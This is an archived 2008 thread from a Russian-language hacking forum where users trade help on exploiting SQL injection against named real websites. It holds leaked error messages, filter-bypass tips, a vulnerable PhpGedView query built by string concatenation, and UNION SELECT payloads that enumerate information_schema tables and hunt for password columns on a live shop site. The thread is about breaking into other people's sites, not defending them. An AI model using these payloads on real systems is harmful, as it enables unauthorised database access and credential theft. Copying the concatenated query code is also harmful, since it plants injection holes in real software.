ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

02.09.2008, 14:53
|
|
Новичок
Регистрация: 20.06.2007
Сообщений: 2
Провел на форуме: 29841
Репутация:
0
|
|
Добрый день... из нескольких сайтов на хостинге нашел только один выдающий мне ошибку... но что-то я не догоняю...
http://www.site.ru/(любое значени)
если значение правильное ты выдается страница с инфой...
если аргумент число но неправильное то - нет такого раздела
В отсальных случаях...
НЕВОЗМОЖНО ВЫПОЛНИТЬ ЗАПРОС SELECT * FROM tree t, content c WHERE t.category_id=c.category_id AND t.category_id=1' потому что syntax error near ''' at line 1
Пробовал подбирать order by....
/1+order+by+10/*
в итоге всега одна и таже ошибка...
НЕВОЗМОЖНО ВЫПОЛНИТЬ ЗАПРОС SELECT * FROM tree t, content c WHERE t.category_id=c.category_id AND t.category_id=1+order+by+10 потому что syntax error near 'order+by+10' at line 1
Помогите плиз нубу...
|
|
|

02.09.2008, 15:16
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме: 599789
Репутация:
227
|
|
может стоит открытая скобка, её нужно закрыть, можно попробовать group by, можно попробовать без пробелов, а с /**/, а может в конце нужно ставить не /*, а +--+. так и не угадаешь что там у тебя - адрес бы сказал
|
|
|

02.09.2008, 15:43
|
|
Новичок
Регистрация: 20.06.2007
Сообщений: 2
Провел на форуме: 29841
Репутация:
0
|
|
Сообщение от o3,14um
может стоит открытая скобка, её нужно закрыть, можно попробовать group by, можно попробовать без пробелов, а с /**/, а может в конце нужно ставить не /*, а +--+. так и не угадаешь что там у тебя - адрес бы сказал
Чего-то у меня никак =(
http://www.akkork.ru/
|
|
|

02.09.2008, 15:44
|
|
Постоянный
Регистрация: 12.06.2008
Сообщений: 654
Провел на форуме: 4512757
Репутация:
973
|
|
2 Art-Ge-Force таблицы теперь угадывай
|
|
|

02.09.2008, 18:10
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме: 1325167
Репутация:
100
|
|
http://man.firstvds.ru/mediaviewer.php?mid=M20'
ERROR:-2 DB Error: syntax error
SQL:SELECT mm_gid FROM media_mapping WHERE mm_media='M20\' AND mm_gedfile='1' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1]
Система PhpGedView
Как можно раскрутить иньекцию?
Бажный кусок кода:
$dbq = "SELECT mm_gid FROM ".$TBLPREFIX."media_mapping WHERE mm_media='".$mid."' AND mm_gedfile='".$GEDCOMS[$GEDCOM]['id']."'";
$dbr = dbquery($dbq);
while($row = $dbr->fetchRow()) {
if ($row[0] != $mid){
$media[$row[0]] = id_type($row[0]);
}
}
$medialist[$keyMediaList]['LINKS'] = $media;
return $media;
}
//Basically calls the get_media_relations method but it uses a file name rather than a media id.
function get_media_relations_with_file_name($filename){
global $TBLPREFIX, $BUILDING_INDEX, $DBCONN, $GEDCOMS, $GEDCOM;
$dbq = "select m_media from ".$TBLPREFIX."media where m_file='".$filename."' and m_gedfile='".$GEDCOMS[$GEDCOM]['id']."'";
$dbr = dbquery($dbq);
if (isset($dbr)){
while($result = $dbr->fetchRow()) {
$media_id = $result[0];
$media_array = get_media_relations($media_id);
return $media_array;
}
}
else{
return array();
}
}
|
|
|

02.09.2008, 18:42
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
Ershik
http://man.firstvds.ru/mediaviewer.php?mid=M20%2527
может чтото типа такого ?
|
|
|

02.09.2008, 18:48
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме: 1325167
Репутация:
100
|
|
Нет, при правильном запросте должно лицо выскакивать
http://man.firstvds.ru/mediaviewer.php?mid=M20
Не могу правильно составить запрос и поля.
|
|
|

02.09.2008, 18:55
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме: 5301021
Репутация:
1879
|
|
http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,table_schema,5,6+from+informa tion_schema.tables/*
Сразу так:
_+union+select+111,222,concat_ws(0x3a,table_name,t able_schema),555,666+from+information_schema.colum ns+where+column_name+like+CHAR(37,112,97,115,37)+l imit+0,1/*
|
|
|

02.09.2008, 23:29
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме: 1469161
Репутация:
142
|
|
Чёт я не догнал,а где вывод?)
|
|
|

03.09.2008, 01:40
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме: 599789
Репутация:
227
|
|
2reZon
покажи где инъекция - впадлу искать
2Ershik
никак - там ковычки экранизируются, а параметр в ковычках
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|